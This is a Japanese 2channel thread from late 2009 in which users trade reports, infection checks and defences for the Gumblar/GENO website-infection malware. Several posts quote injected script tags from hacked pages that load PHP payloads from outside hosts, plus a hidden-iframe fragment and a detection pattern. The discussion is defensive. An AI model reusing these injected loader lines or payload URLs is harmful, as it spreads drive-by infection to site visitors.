753名無しさん@お腹いっぱい。:2009/11/24(火) 03:48:05
ざまぁw
と言っていいのかな、これ
754名無しさん@お腹いっぱい。:2009/11/24(火) 13:36:20
>>752で気になってちょっと調べてみたさくらの結果

セーフ ブラウジング - sakura.ne.jp の診断ページ
http://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp/&hl=ja

あと、gumblar.cnってほんとに復活してるんだね
http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja
755名無しさん@お腹いっぱい。:2009/11/24(火) 14:00:39
いや、gumblar.cn自体はもう死んでる。
Gumblar "A" Record Down
ttp://blog.scansafe.com/journal/2009/11/6/gumblar-a-record-down.html
半年前と違ってウイルス散布サーバも乗っ取られたサーバ群だから
IPやホストではブロックしようがないわけで。
756名無しさん@お腹いっぱい。:2009/11/24(火) 14:48:32
腹痛てぇwww

1. 在宅、副業
tp://ivyfancl.com/japan.html
2. メールスナイパー
tp://ivyfancl.com/mail/style.html
3. 在宅ワーク、副業、稼ぐ
tp://ivyfancl.com/style.html
4. 在宅、副業、稼ぐ
tp://ivyfancl.com/
5. 在宅、ワーク
tp://ivyfancl.com/law.html
6. 副業、稼ぐ
tp://ivyfancl.com/sublime.html
7. 在宅ワーク、初心者
tp://ivyfancl.com/webdo.html
8. 在宅、副業、サイドビジネス
tp://ivyfancl.com/order.html
9. 在宅、サイドビジネス
tp://ivyfancl.com/point.html
757756:2009/11/24(火) 14:52:13
10. メールスナイパー
tp://ivyfancl.com/mail/law.html
11. メールスナイパー
tp://ivyfancl.com/mail/point.html
12. メールスナイパー
tp://ivyfancl.com/mail/webdo.html
13. メールスナイパー
tp://ivyfancl.com/mail/sublime.html
14. メールスナイパー
tp://ivyfancl.com/mail/index.html
15. メールスナイパー
tp://ivyfancl.com/mail/order.html
16. メールスナイパー
tp://ivyfancl.com/mail/law2.html
17. メールスナイパー
tp://ivyfancl.com/mail/japan.html

ろりぽっぷ・・・
758754:2009/11/24(火) 16:30:10
>>755
そうなのか、勘違いごめん
じゃあこの
>不正なソフトウェアをホストしていたかどうか
>はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。
>○○を含む 5475 個のドメインを感染させています。

ってどういう意味?
言葉の通りgumblar.cnがウイルスに感染させたサイトの数だと思ってたんだけど
あと日本語で頼む
759名無しさん@お腹いっぱい。:2009/11/24(火) 17:20:25
firefoxのアドオンのdr.webのリンクチェッカーなんかは対策として有効かな?
760名無しさん@お腹いっぱい。:2009/11/24(火) 17:39:00
>>759
Virustotalに投げたときの検知状況はよくないようだからスルーしそう

少し前のスクリプト
ttp://www.virustotal.com/jp/analisis/1cac6b73236eede62508d4594e24e81e07e88f594f8cee7f7a8e0e176aa56af9-1259051650
最近のスクリプト
ttp://www.virustotal.com/jp/analisis/9dba2b4f27fb7b39693ba31e2ccfa5b4a3989787a9390d97522fcfb49da450be-1259051542

それより各種アップデートをしっかりやったほうがいいと思う
761名無しさん@お腹いっぱい。:2009/11/24(火) 17:45:05
>>759
「引っ掛かったらラッキー」という程度の代物であり、
使う毎にping撃ってくるのが気に食わないから
うんこ(非推奨)とす。

異議は認めない。
762名無しさん@お腹いっぱい。:2009/11/24(火) 17:49:22
>>759
Secunia PSI とかでパッチの適用が万全か調べる方がGENO対策としては有効。
763名無しさん@お腹いっぱい。:2009/11/24(火) 18:07:48
764名無しさん@お腹いっぱい。:2009/11/24(火) 18:10:15
>>758
Googleの判定なんて知ったこっちゃないっつーかGoogleに聞いてくれって話だが、
そもそも90日前っつったら大昔じゃん。gumlar.cnやmartuz.cnを使わずに
陥落サイト群を使ってばらまき始めた先月からだよ。今は両ドメインともDNSから消えてる。
Aレコードって何? とか聞かれても困るんで知りたきゃDNSについてググって勉強してくれ。

>>759
Dr.WEBはスクリプトは苦手なんだよね。
似たようなのでMcAfeeのSiteAdvisorってのもある。
765754:2009/11/24(火) 18:53:56
>>764
ごめん、そうする
こんな低レベルな質問に答えてくれてありがとう
766名無しさん@お腹いっぱい。:2009/11/24(火) 23:41:53
人のサイト見にいったら何故か表示が遅いので(関係ないかもしれないが)、
ソースをみたら、<body>の直前にこんなのが埋め込まれていた。
<script src=http://ejame.ir/images/default00000000.● ></script>
拡張子はphp

自分、セキュリティ0だから、サイトに対してエラーはでないんだけど、黒かな
767名無しさん@お腹いっぱい。:2009/11/24(火) 23:47:43
情弱な質問なんだが、Wikiに書いてある感染確認方法って、
今暴れてる亜種には意味無し?
あと、avast入れてるけど、こいつは検出してくれる?
768名無しさん@お腹いっぱい。:2009/11/24(火) 23:48:08
黒だと思うよ
769名無しさん@お腹いっぱい。:2009/11/24(火) 23:55:24
>>768
ありがとう。管理人さんに問い合わせてみるよ。
後、自分もカスペDLしてチェックしてくる・・・|カスペ|   λ....
770名無しさん@お腹いっぱい。:2009/11/25(水) 00:31:45
>>767
亜種には意味無し
分かっている確認方法としてレジストリの
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の中にmidi9のエントリがあったら感染済(XP)

↓こちらが詳しい
ttp://xx2zz.blog77.fc2.com/blog-entry-131.html

avast!は最近のスクリプトは検知しない
ttp://www.virustotal.com/jp/analisis/9dba2b4f27fb7b39693ba31e2ccfa5b4a3989787a9390d97522fcfb49da450be-1259051542
またウイルス本体にもすべてには対応していない
が、比較的検出はいいほうだと思う

今回一番対応のよさそうなカスペエンジンでスキャンするのが安全か
↓カスペエンジンのオンラインスキャン

@niftyウイルスチェックサービス
ttp://www.nifty.com/security/vcheck/index.htm
771名無しさん@お腹いっぱい。:2009/11/25(水) 00:45:35
>>764
ブロック調査した人が居た。
ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=Gumblar%A4%CE%A5%D6%A5%ED%A5%C3%A5%AF%BE%F5%B6%B7%A4%CE%CE%E3

を見る限り、Firefox+NoScriptが最も有効な対策と言えるかもしれん。

というか、アンチウイルス各社は
/*</head><script src=http//:*.php ></script><BODY*/
↑これを「黒判定」にすべき。
772名無しさん@お腹いっぱい。:2009/11/25(水) 01:28:13
>>766だけど、カスペインストしてサイトチェックしたら、「トロイの木馬だぜ」って結果だった。
GENOウィルスチェッカーに通したけど、危険度0%なんだよね。
亜種については、GENOウィルスチェッカーを信用しない方がいいかな
773名無しさん@お腹いっぱい。:2009/11/25(水) 01:29:23
GENOウィルスチェッカーなんて過去のもの
774名無しさん@お腹いっぱい。:2009/11/25(水) 01:33:51
>>771
FirefoxはNoScript入れる
Google Chromeは -disable-javascriptで起動
IEは面倒だから使うな
775名無しさん@お腹いっぱい。:2009/11/25(水) 01:34:14
糞チェッカーは死んだ
776名無しさん@お腹いっぱい。:2009/11/25(水) 01:42:13
>>770
そこのレジストリにauxが無いのだがこれは大丈夫なのかな?
777名無しさん@お腹いっぱい。:2009/11/25(水) 02:05:33
>>776
無いのなら問題ないんじゃ? うちにも無いし
一覧見て意味をなさないような名前のドライバが
登録されてたら危ないだろうけど

とはいえコロコロ内容を変えるウイルスだから
これなら安全と言い切れないのがGumblarの怖いところ
778名無しさん@お腹いっぱい。:2009/11/25(水) 02:13:44
>>777
ありがとう
無知な自分は意味をなさないドライバがどれなのかさえ分からない
本当怖いなぁ
779名無しさん@お腹いっぱい。:2009/11/25(水) 06:36:03
>>770
その詳しいと書かれてるブログに、regedit.exeから確認しようとすると
midi9のエントリを一時的に削除する隠蔽動作について説明されてるんだが
regedit.exeで確認できないならどこから確認すればいい?
780名無しさん@お腹いっぱい。:2009/11/25(水) 10:37:36
>>779
http://www3.atword.jp/gnome/
サイドメニューの「Zlkon, Gumblar 問題に関して」を参考に汁
781名無しさん@お腹いっぱい。:2009/11/25(水) 10:56:50
>>780
先に言われてしまったが・・・

>>779
とりあえずregedit.exe以外なら不正なdllの注入を行わないはずなので
↓他のレジストリエディタを使う(Win2k以降。Windows7で動くかは不明)
 お約束だが自己責任で

激動たる俺RegEdit改
ttp://textexpage.s154.xrea.com/software/gekiorekai/
RegPro(要Microsoft .NET Framework 2.0)
ttp://www.vector.co.jp/soft/winnt/util/se464478.html

↓対処するならに確かにこちらか
http://www3.atword.jp/gnome/zlkon-gumblar-問題に関して/
まあこれは100点満点の対策だと思うから
普通は各種セキュリティ・アップデートすれば怖くない・・・はず

>>778
説明が中途半端だったと思うので念のため上記のレジストリエディタで確認してみて?
782778:2009/11/25(水) 13:03:04
>>781
どうもありがとう、確認してみます
一応アップデート類は全部してあるのだけど心配で
783名無しさん@お腹いっぱい。:2009/11/25(水) 13:42:20
>>758
日本語って?
784名無しさん@お腹いっぱい。:2009/11/25(水) 16:17:18
今回の場合感染するとなる症状とかないのかな?
785名無しさん@お腹いっぱい。:2009/11/25(水) 16:36:19
>>784
XPで最悪な症状が >>420 の「黒い画面にマウスカーソル」でセーフモードでも起動しない
786名無しさん@お腹いっぱい。:2009/11/25(水) 16:55:03
>>785
ありがとう、そうなったら感染確実なんですね
もっとわかりやすい確認方法があればいいのになぁ
怖くてネットサーフ出来ないorz
787名無しさん@お腹いっぱい。:2009/11/25(水) 17:15:22
>>786
その症状だってWindows Updateをきちんとしていればふさがれていた穴を付かれたものだよ。
将来はともかく、今のところ付かれてるのは既知の穴だけなんで必要以上に恐れることはない。
788名無しさん@お腹いっぱい。:2009/11/25(水) 18:04:43
万一のためにバックアップをとっておけば何も恐れることはないだろうに
789名無しさん@お腹いっぱい。:2009/11/25(水) 18:42:57
XP機のほうをたまに再起動した時にたまたまHDDの読み込みが遅くて
「黒い画面にマウスカーソル」になったままで心臓に悪い

もちろん難なく起動するけど
790名無しさん@お腹いっぱい。:2009/11/25(水) 19:02:25
>>787-788
ありがとう、気にしすぎですねorz
791名無しさん@お腹いっぱい。:2009/11/25(水) 19:17:19
>>790
気にしすぎも良くないけど
セキュリティソフト任せで安心しきるのも問題
常にセキュリティ意識を忘れなければいい
792名無しさん@お腹いっぱい。:2009/11/25(水) 19:20:32
>>790
まあ、安全なブラウジングを目指すのも悪くない
FirefoxにNoscriptアドオンとかプライベートブラウジングあたりが定番か
793名無しさん@お腹いっぱい。:2009/11/25(水) 20:08:24
>>791-792
以前流行った時このスレを見てFirefoxとNoscript入れました
親切にありがとう、神経質になりすぎないで気をつけます
794名無しさん@お腹いっぱい。:2009/11/25(水) 20:38:20
画面が真っ暗、マウスしか表示されない状態になり、knoppixで
レジストリの復元をしましたが、起動しませんでした。
WinPEイメージでレジストリ値のmidi9を削除してみようと思うのですが、
起動する見込みはありますか。レジストリについて詳しくないので、
教えていただけるとありがたいです。
795名無しさん@お腹いっぱい。:2009/11/25(水) 23:08:02
>>793
わけがわからないまま神経質になっても何の意味もない
ソフトウェアの更新をすれば今のところ問題ありません
そういう対策をきちんと行ってください
Firefox+NoScriptは理解できない人は使わないほうがいい
796名無しさん@お腹いっぱい。:2009/11/25(水) 23:08:54
>>794
自分で調べられない程度ならやめたほうがいい
797名無しさん@お腹いっぱい。:2009/11/25(水) 23:52:47
>>792
プライベートブラウジング=サンドボックスじゃないから
マルウェアの類には意味茄子でごわす。

>>794
knoppixが使えるなら、必要なファイルだけサルベージして
クリーンインストールを推奨する。
798名無しさん@お腹いっぱい。:2009/11/25(水) 23:59:27
>>795
ソフトウェアは更新してます
もう少しちゃんと調べてみますね。本当ありがとう
神経質すぎるのも駄目ですねorz
799名無しさん@お腹いっぱい。:2009/11/26(木) 00:08:39
800名無しさん@お腹いっぱい。:2009/11/26(木) 00:14:33
>>799
うわ、本当にありがとうございます
スレ見てみますね
801名無しさん@お腹いっぱい。:2009/11/26(木) 01:19:38
>>792
Noscriptなんか使うよりもSandboxieでブラウザをサンドボックス化する方がいいよ。
802名無しさん@お腹いっぱい。:2009/11/26(木) 01:25:41
弱弱権限のユーザーを作って、そのユーザー権限でブラウザを実行するほうがいい
803名無しさん@お腹いっぱい。:2009/11/26(木) 02:30:20
>>796
もう少し調べて分からければやめようと思います。
>>797
やはりクリーンインストールが確実かつ安全ですよね。
804名無しさん@お腹いっぱい。:2009/11/26(木) 03:12:21
>>759
あるスクリプトはそれ自体がDr.WEBリンクチェッカーを蹴ってるぽい…
飛び先のチェックやDan'sViewSourceも蹴って、ソースチェッカーオンラインじゃないとソースがでなかったりするし。。。
805名無しさん@お腹いっぱい。:2009/11/26(木) 09:47:09
>>799
CTMがある今ではそんなのゴミなだけ。

>>801
Sandboxieは感染後の対策、Noscriptは感染前の対策。
役割が違うものを同列に扱うなよ。
806792:2009/11/26(木) 10:30:37
>>797
セーフブラウジング機能のつもりだったorz

>>801
個人的には有料ユーザーで導入済
ただ動作を理解していないとかえって危ないと思うので
人には勧めにくいかと

一般に勧めるのは
>>802 の制限ユーザーにするのがよさそうだな
ぐぐればアカウントの作り方くらいはすぐだし
権限がないとウイルスも大したことは出来ないから
ドライバに登録するGumblarには非常に有効だと思う
なにより普段と使い勝手が変わらないのがいい
807名無しさん@お腹いっぱい。:2009/11/26(木) 10:48:58
いや、Windowsに関しては制限ユーザーで使うのが一番難しいだろ。
インストールや設定変更、正常な動作にに管理者権限を必要とするアプリが多すぎるもの。
808名無しさん@お腹いっぱい。:2009/11/26(木) 11:13:20
>>781
自己レス
>とりあえずregedit.exe以外なら不正なdllの注入を行わないはずなので
どうやら違う模様
regedit.exeのみならずほとんど全てのプログラムに挿入されるので
他のレジストリエディタでも隠蔽されるとのこと
どうしたら確認できるんだろう?
セーフモードでもだめなのかね

ttp://xx2zz.blog77.fc2.com/blog-entry-131.html
>追記(11/25): レジストリキー・エントリの隠蔽はregedit.exeに限った挙動ではありません
>2chの某スレやUnderForge of Lack ≫ Zlkon, Gumblar 問題に関してにてこの記事が紹介さ
>れていましたが、レジストリキー・エントリの隠蔽が行われるのはregedit.exeだけだと誤解を与
>えてしまったようです。
>たしかに上記説明ではそう読み取れます。説明不足により誤解を与えてしまい申し訳ありませ
>ん。
>また、これらの情報は、私が取得できたGumblarの不正DLLの解析結果に基づいて書いている
>ので、他の不正DLL、または今後の亜種でも同じであるとは限りません。

説明補足はリンク先へ
809名無しさん@お腹いっぱい。:2009/11/26(木) 11:17:25
>>807
だからブラウジングの時だけ制限ユーザーにすればいいと思う
810名無しさん@お腹いっぱい。:2009/11/26(木) 14:11:02
うーん、AVG提供のオンラインスキャンでも駄目かな?
ttp://linkscanner.explabs.com/linkscanner/default.aspx
811名無しさん@お腹いっぱい。:2009/11/26(木) 16:53:16
ウイルス感染をプロキシで防ぐ
ttp://itpro.nikkeibp.co.jp/article/Watcher/20091124/340899/

「Gumblarと,その亜種や模倣ウイルスのケースでは,
企業ネットワークのプロキシでcnドメインとlvドメインへの
アクセスを制限していれば,感染を防止できた可能性が高いのだ。」

って本当かよ?
812名無しさん@お腹いっぱい。:2009/11/26(木) 16:59:55
ごめんなさい、嘘です
813名無しさん@お腹いっぱい。:2009/11/26(木) 17:06:50
>防止できた可能性が高い
可能性って言葉は便利
814名無しさん@お腹いっぱい。:2009/11/26(木) 17:18:02
>>811 ひどい記事だな…。
815名無しさん@お腹いっぱい。:2009/11/26(木) 17:29:11
>>811
10月中頃からの新型の亜種には何の役にも立たないよねえ
816名無しさん@お腹いっぱい。:2009/11/26(木) 17:37:42
817名無しさん@お腹いっぱい。:2009/11/26(木) 18:10:46
と思ったらさっき採ってきたスクリプトはスルーか・・・
しかしカスペはスクリプトを見逃さないな

結果: 2/41
Kaspersky 7.0.0.125 2009.11.26 Trojan-Downloader.JS.Gumblar.x
VirusBuster 5.0.21.0 2009.11.25 JS.Crypt.DMX ←トレンドマイクロにあらず
ttp://www.virustotal.com/jp/analisis/513c24e487f4b631a2f1ab2bf348dcb75333c6b956478b96afcb210d1554f09c-1259226008
818名無しさん@お腹いっぱい。:2009/11/26(木) 18:29:58
>>805
CTMは仮想化ツールじゃないだろ。

ここは、Gumblarに関する話題
・陥落サイトの報告、確認
・感染を防ぐ、確認方法の話
・\(^o^)/オワタ人のサルベージ
などを行うスレのはずだ。

専門的な話は砂箱スレでやってくれ。

【総合】サンドボックス 砂箱 sandbox
http://pc11.2ch.net/test/read.cgi/sec/1202282636/
819名無しさん@お腹いっぱい。:2009/11/26(木) 19:54:07
>>808
reg関連がダメなら、Double Driverとか使って追っかけられないのかな?
ttp://all-freesoft.net/hard3/driver/doubledriver/doubledriver.html
820名無しさん@お腹いっぱい。:2009/11/26(木) 20:05:56
GMERはどうだ?
821名無しさん@お腹いっぱい。:2009/11/26(木) 20:43:52
>>819
実験してみないとなんともいえないが、起動時に読み込ませるためだけに登録するわけだから
正規の手順で登録したドライバのようにはリストアップされない気がする
822名無しさん@お腹いっぱい。:2009/11/26(木) 21:20:17
あさはかかもだけど
EWFとか使い道ないかな
http://msdn.microsoft.com/ja-jp/library/bb521577%28WinEmbedded.51%29.aspx
823名無しさん@お腹いっぱい。:2009/11/26(木) 23:35:08
なんかでてるね。サイト開いても感染とか

nyで新ウィルス、割れ厨のデスクトップが自動でアップローダに投稿される
http://tsushima.2ch.net/test/read.cgi/news/1259241896/
824名無しさん@お腹いっぱい。:2009/11/27(金) 01:21:04
>>823
ttp://www.virustotal.com/jp/analisis/ee5982b95d9aa6b5bc965b6278498ddcbc661609ca99f52870b7bf9ae647ec8e-1259252153
オールスルーだが、割れ厨じゃないやつには関係無いハナシ
825名無しさん@お腹いっぱい。:2009/11/27(金) 01:26:36
偽物って気づけよ
826名無しさん@お腹いっぱい。:2009/11/27(金) 01:33:50
昔からある山田ウィルスってやつでしょ
違いはsetup.exeが偽装されている事
P2Pやっていて落としたexeを実行しない限りは問題ないはず

ところで、GENOにはHijackThisなどのソフトは無意味なのかな?
827794:2009/11/27(金) 01:46:30
WinPEでmidi9を削除したところ、正常に起動しましたが、
推奨されているクリーンインストールを行おうと思います。
アドバイスくださった方々ありがとうございました。
828名無しさん@お腹いっぱい。:2009/11/27(金) 01:52:21
レジストリ値のエントリで感染してるかどうかの判断で重要なのは、
midi9であって、midiというエントリは関係ないのでしょうか?
829名無しさん@お腹いっぱい。:2009/11/27(金) 01:58:01
うちはvistaだけど、midi/midi1/auxがある
ちなみにサウンドカードは挿してる
830名無しさん@お腹いっぱい。:2009/11/27(金) 02:00:07
>>827
復旧おめ
まあ再インストールが無難だな
Gumblarには何をされてるか分からんから・・・
あとOS再インストール後にパスワード類を変更することを薦める
831名無しさん@お腹いっぱい。:2009/11/27(金) 02:05:22
ただのmidiはオーディオデバイス関連とかそういうのみたいですね
全然ここら辺のこと分かってないから駄目なんだろうな。

何度も言われてるように感染してるかどうかだけでも
判断できる何かがあればいいのにと思ってましたが、
今のところは私のような素人には、>>770さんの情報が
感染してるか確認するには良い方法みたいですね。ほんと感謝です。
>>827さん頑張れ。
832名無しさん@お腹いっぱい。:2009/11/27(金) 02:07:54
あるサイト行くと(まあアダルトだがw)、俺のカスペが、
遮断しました: Trojan-Downloader.JS.Gumblar.x ・・・ ●ttp://taemkft.extra.hu/sitebuilder/24.php
なんて言ってくるんで、
gred, Norton Safe web, aguse,と試したが、どこもセーフと言ってくる。
●●phpのほう入れて試してもセーフ。だが直で行くと遮断くらう!
aguseなんて、同じカスペでスキャンしてるはずなのに…

結局、このサイトは安全なの?
おかしいのは俺?カスペ?もちろん定義ファイルは最新なんだが…

833名無しさん@お腹いっぱい。:2009/11/27(金) 02:10:14
レスあまり見ないで書いてしまったら、上記の方法でも
midi9を一時的に削除して〜とかになってしまってるという話になってるんですね。
結局、XPだと起動しないとか、最悪な状態にならないと感染してるか分からないままとかなのかな・・・。
手口が巧妙で嫌だな。連投すみません。
834名無しさん@お腹いっぱい。:2009/11/27(金) 02:16:02
>>832
ソースチェッカーで見てみたらどうなる?
835名無しさん@お腹いっぱい。:2009/11/27(金) 02:20:51
>>832
「黒」
命拾いしたな。
836名無しさん@お腹いっぱい。:2009/11/27(金) 02:22:53
ソース見たら色んな数字が並んでたけど、あれは感染してるってことか?
837835:2009/11/27(金) 02:26:09
838名無しさん@お腹いっぱい。:2009/11/27(金) 02:28:32
ノートンは行けばはじくよ
839名無しさん@お腹いっぱい。:2009/11/27(金) 02:33:38
>>833
簡単にチェックする方法がなくなったからな・・・
心配ならGumblarの対応がよさそうなKasperskyでスキャンするくらいか
下のはKasperskyエンジンのオンラインスキャンサービス
ウイルス対策ソフトを入れてないならKasperskyの体験版を一時的に入れるのも手

@niftyウイルスチェックサービス
ttp://www.nifty.com/security/vcheck/index.htm
840名無しさん@お腹いっぱい。:2009/11/27(金) 02:38:11
>>839
やはりそれしか今のところはないようですね。
丁寧に教えてくださってありがとうございます。
841名無しさん@お腹いっぱい。:2009/11/27(金) 02:39:01
セキュアブレイン、クラウド活用ウイルス対策ソフトを無償提供
ttp://internet.watch.impress.co.jp/docs/news/20091126_331491.html

「gred AntiVirusアクセラレータ」は単体でも動作可能だが、
併用するウイルス対策ソフトが検知したウイルス情報を
クラウドで共有することで検知率を高めるという。

併用可能なウイルス対策ソフトは、
「ノートンアンチウイルス」
「ノートンインターネットセキュリティ」
「ノートン360」
「ウイルスバスター」
「ウイルスセキュリティZERO」
「カスペルスキー インターネットセキュリティ」
「Microsoft Security Essentials」
「avast! AntiVirus」
「Avira AntiVir」
「AVG」など。
842名無しさん@お腹いっぱい。:2009/11/27(金) 02:45:05
>>841
>>832 にgredの文字が見えるがスルーしてる?
まだ使用者が2万人程度だから仕方がないか
843名無しさん@お腹いっぱい。:2009/11/27(金) 03:15:19
knoppixでgenoウイルスを除去できると聞いたんですが、やり方が載ってるサイトはありますか?
844名無しさん@お腹いっぱい。:2009/11/27(金) 03:26:30
>>842
>まだ使用者が2万人程度だから仕方がないか
そのとおり
効果が期待できるのはこれから
845名無しさん@お腹いっぱい。:2009/11/27(金) 03:28:51
NIS2010のSONAR2は役に立つのだろうか
846832:2009/11/27(金) 03:29:28
ああ、俺の言ってるgred, は、サイトの安全性をチェックするサイトのほう。
ここね→ ttp://www.gred.jp/
同じ会社だが、ソフトのgred AntiVirusアクセラレータを入れて試したってことではない。

他のNorton Safe web, aguse,も同じようなとこ。url入れると、そこは安全とか言ってくれるやつ。
ソースチェッカーのオンラインもあったね、前述のより見た目わかりづらいんでやってない。w

どうなんだろうね、こういうやつの信頼性って?
847名無しさん@お腹いっぱい。:2009/11/27(金) 03:31:05
Norton Safe webは2ch型の掲示板を見るだけで真っ赤になるから信用はしていない
848名無しさん@お腹いっぱい。:2009/11/27(金) 03:31:41
>>845
何度も言われてるとおり脆弱性保護で検知される
849名無しさん@お腹いっぱい。:2009/11/27(金) 03:33:15
>>846
安全とかの記述より、とりあえずソースだけチェックしてみたらGENOっぽいのない?
850名無しさん@お腹いっぱい。:2009/11/27(金) 03:35:12
SONARは初代はスルースキルwが高かったけど2は凄い
アプリを強制的に削除しまくり(復元可)
symantecに簡単に報告できてすぐに対応してくれるのが救いか
誤爆率高いんだからある程度は働いてもらわないとな
851名無しさん@お腹いっぱい。:2009/11/27(金) 04:01:04
>>843
正確にはシステムの復元機能のバックアップを使って
レジストリをmidi9のエントリがない状態に書き戻す方法だと思う
単にレジストリを復元するだけでウイルスを除去するわけではない
例の「黒い画面にマウスカーソル」に有効

参考サイト
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
852名無しさん@お腹いっぱい。:2009/11/27(金) 05:56:25
>>846
そのサイトは>>832にある.huドメインじゃなくて別のアドレスなんだよね?
で、そこへ行くと.huドメインからなんか落ちてくると言われるんでしょ
>>832のURL削ってトップページをAguseで見てみたら
KasuperskyがTrojan-Clicker.JS.Iframe.bc と警告出したよ。
覗いたURLがどこのものか知らないけど.hu(ハンガリードメイン)からphpを引っ張ってくる必要があるサイトなのかどうか考えた方が良い。

>>853は無視か可哀想に

Gumblarに限らずだけど、閲覧ブラウザで落してくるウィルス変えたりするやつは
Aguseやgredみたいなので覗くと何も返してこないのかウィルス判定出ないことが結構ある。
JavaScriptが無効だとGoogleのトップページにリダイレクトされるとか
脆弱性のないPCで覗くと404返すとかそういう仕組みになってることもある。

でNorton Safe Webはリアルタイムで検査するわけじゃないから、
ウィルス撤去されてもなかなか判定が変わらないとか普通にある。
ドメイン単位だから、レンタルスペースでいろんなHPが同居してても全てまとめて判定する。
853名無しさん@お腹いっぱい。:2009/11/27(金) 10:06:23
Thanks!
>>849
ソースチェッカーは、見てみた。怪しいリンクは確かにあるぞってことぐらいで、
それ以上俺にはよくわからないと言うのが、正直なとこなんだ。ごめん。

>>852
Aguseは、俺と同じKasuperskyでチェックするらしいのに、安全とか言うから、
おかしいのは、こっちか?と不安だったんだが、そういうことか。
まあ、もうあそこ覗くのはやめとこうと思う。
854名無しさん@お腹いっぱい。:2009/11/27(金) 14:48:22
>>811の記事だが・・・

自宅の壁とか屋根に巨大な穴が空いても、
ダンボールとガムテープで穴を塞げばきっと大丈夫。

ってことだろ?


筆者はセキュリティを語る以前に、
自分の脳の障害(バグ)を治した方が良いような希ガス。
855名無しさん@お腹いっぱい。:2009/11/27(金) 15:57:23
>>811の記事についてはGnomeさんも呆れてるね。
ttp://www3.atword.jp/gnome/2009/11/26/a-reason-why-the-bots-never-be-disappeared/

「新型インフルエンザは、去年のインフルエンザワクチンでも
撃退できる可能性が高い」って言ってるようなもんだよね。
856名無しさん@お腹いっぱい。:2009/11/27(金) 18:49:04
>>832
aguseはゲートウェイを使わないと検出しないことが多い
と思ってTOP見に行ったら別のものを検出した
Trojan-Clicker.JS.Iframe.bc
857名無しさん@お腹いっぱい。:2009/11/27(金) 21:12:46
>>>856
この部分かな?
<script>var jojo = document.createElement('iframe')
〜中略〜
jojo.setAttribute('style', 'display:none')
以下略
858名無しさん@お腹いっぱい。:2009/11/27(金) 21:15:34
>>832はIE専用?
859名無しさん@お腹いっぱい。:2009/11/27(金) 23:16:16
いや。IE以外のスクリプトもあるのでFxもOperaもやられる
(FlashPlayerやAdobeReaderが古い場合。IEも同様)。
ちなみになぜかUA文字列「Safari」を蹴っているので
SafariやChromeは感染しない(Chromeの砂箱に引っかかるのか?)。
860名無しさん@お腹いっぱい。:2009/11/28(土) 13:12:30
861名無しさん@お腹いっぱい。:2009/11/28(土) 17:30:08
>>860
それだとgeocities全体であってその特定サイトだけじゃなくね?
862名無しさん@お腹いっぱい。:2009/11/28(土) 17:33:54
ついでにそのサイト自体も現時点ではこんな感じでクリーン
</head>

<body bgcolor=white
863名無しさん@お腹いっぱい。:2009/11/28(土) 18:25:32
1日20分!〜(ry
先日、Gnomeさんが苦笑してたスパム業者のサイトだが・・・
ivyfancl.com/style.html
※URLは17個くらいある

11/21頃に入ってたやつ
<script src=hxxp://astrologe-goette.de/bilder/kinder.php ></script><BODY

さっき覗いてみた
<script src=hxxp://soinsantirides.com/index_fichiers/Dossiers_Conseils.php ></script><BODY

これって無限ループ中?
864名無しさん@お腹いっぱい。:2009/11/28(土) 18:29:36
そういうのは削除と挿入の繰り返しが行われてるってことになる
つまり原因を理解できてないままとりあえず削除して運用を続けてる
865名無しさん@お腹いっぱい。:2009/11/28(土) 18:37:01
いんじぇくしょん祭www
ttp://asianmotors●co●in/
866名無しさん@お腹いっぱい。:2009/11/28(土) 18:37:47
あらあら
867名無しさん@お腹いっぱい。:2009/11/28(土) 23:03:04
結局フラッシュだかadobeだか更新しとけばいいだけ
そうじゃないのもあるけどそれはまた別の話だろー
868名無しさん@お腹いっぱい。:2009/11/29(日) 00:04:08
別じゃないよ
869名無しさん@お腹いっぱい。:2009/11/29(日) 00:07:14
別って言えば別だけど
今はGumblarじゃなくてGumblar.xの話だからな
870名無しさん@お腹いっぱい。:2009/11/29(日) 01:07:01
Gumblar.xでも同じ
871名無しさん@お腹いっぱい。:2009/11/29(日) 01:38:04
Gumblarでは別だが
Gumblar.xでは別じゃないってこと
だからどっちも正しい
872名無しさん@お腹いっぱい。:2009/11/29(日) 01:40:16
何でもかんでもGENOにするやつがいるからな
そう言う話題ももちろん良いけど
873名無しさん@お腹いっぱい。:2009/11/29(日) 03:44:14
Gumblar.xでも同じだっつの
未知の脆弱ついたりしてないから
874名無しさん@お腹いっぱい。:2009/11/29(日) 03:57:44
亜種が○○かもしれん
てどこまでも不安煽ったりね
875名無しさん@お腹いっぱい。:2009/11/29(日) 04:00:38
収束するならウィルスはこの世からとっくに根絶してると思わry
876名無しさん@お腹いっぱい。:2009/11/29(日) 04:04:59
詮無きこと
877名無しさん@お腹いっぱい。:2009/11/29(日) 04:06:56
>>873
何言ってんだ
無知で日本語も通じない人は書き込まないでね
878名無しさん@お腹いっぱい。:2009/11/29(日) 04:17:58
Gumblar.xでも同じだっつの
未知の脆弱ついたりしてないから
879名無しさん@お腹いっぱい。:2009/11/29(日) 04:21:25
既知の脆弱性だから個々ノソフトを
結局更新しとけばいいだけか
880名無しさん@お腹いっぱい。:2009/11/29(日) 04:30:44
何が同じなんだよ
ちゃんと詳しく書けよ
そりゃ同じようなところもあるが違うだろ
アホか
881名無しさん@お腹いっぱい。:2009/11/29(日) 04:31:52
ウイルスは皆同じと言ってるのと同じだろw
どうでも良いけど
882名無しさん@お腹いっぱい。:2009/11/29(日) 04:33:56
ソフトを更新しとけば感染しないのは同じ
883名無しさん@お腹いっぱい。:2009/11/29(日) 04:36:14
何でもかんでもGENOにするやつがいるからな
884名無しさん@お腹いっぱい。:2009/11/29(日) 04:38:14
>>883
GENOに頭やられたな
885名無しさん@お腹いっぱい。:2009/11/29(日) 04:42:08
>>882
同じマルウェアはいっぱいあるな
886名無しさん@お腹いっぱい。:2009/11/29(日) 04:42:26
なにが
887名無しさん@お腹いっぱい。:2009/11/29(日) 04:43:24
拡大しててきた時点でそうじゃないマルウェアもいっぱいあるな
888名無しさん@お腹いっぱい。:2009/11/29(日) 04:43:25
どうでも良いよ
レベル低すぎて意味がない
889名無しさん@お腹いっぱい。:2009/11/29(日) 04:55:35
詮無きこと
